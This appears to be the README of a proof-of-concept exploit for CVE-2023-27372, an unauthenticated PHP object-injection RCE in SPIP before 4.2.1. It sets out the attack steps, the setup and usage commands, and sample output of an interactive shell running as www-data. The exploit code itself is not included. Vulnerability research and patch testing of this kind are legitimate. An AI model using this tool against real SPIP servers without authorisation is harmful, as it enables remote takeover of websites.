CVE-2023-27372 — SPIP < 4.2.1 Unauthenticated RCE (PoC)

Unauthenticated remote code execution vulnerability in SPIP before 4.2.1. The oubli parameter in the password reset form is vulnerable to PHP object injection due to mishandled deserialization. A crafted serialized payload is executed server-side as the web user, and the output is reflected back in the response inside the oubli input field value.

---

How it works

1. Fetches the anti-CSRF token from /spip.php?page=spip_pass.
2. Sends a POST request with a PHP serialized payload injected into the oubli parameter.
3. Extracts the command output from the reflected value attribute in the response.
4. Loops for interactive command execution, refreshing the CSRF token on each request.

Requirements

• Python 3
• Install dependencies:

python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit

Usage

python3 exploit.py -u http://TARGET/spip

Example:

$ python3 exploit.py -u http://10.10.10.10/spip
[*] Fetching anti-CSRF token...
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

References

• CVE-2023-27372
• Original PoC by nuts7
• SPIP release notes

Credits

• Discovery & original exploit: nuts7
• Cleanup & interactive shell: Esteban Zárate